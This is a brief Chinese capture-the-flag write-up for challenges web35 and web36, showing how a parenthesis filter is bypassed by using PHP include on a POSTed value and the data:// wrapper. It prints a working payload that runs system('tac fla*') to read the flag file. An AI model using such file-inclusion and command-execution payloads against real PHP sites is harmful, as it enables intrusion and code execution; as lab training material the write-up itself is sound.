web35
分析源碼
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsIyZuBnLzkTMwQjN1IjM3ETNwEjMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
發現對括号進行過濾,那麼隻能使用不帶括号的函數,
include $_POST[a]
進行檔案包含,看到能檔案包含之後,可以嘗試使用data協定指令執行,雖然data協定的指令執行寫過很多遍了,但是還是再要提一下
data:text/plain,<?php system("指令");?>
構造
payload: ?c=include%a$_POST[a]?> POST:a=data:text/plain,<?php system('tac fla*');?>`
成功擷取flag
web36
web36也是一樣的解題方法,直接參考web35,這裡不做詳解,直接放圖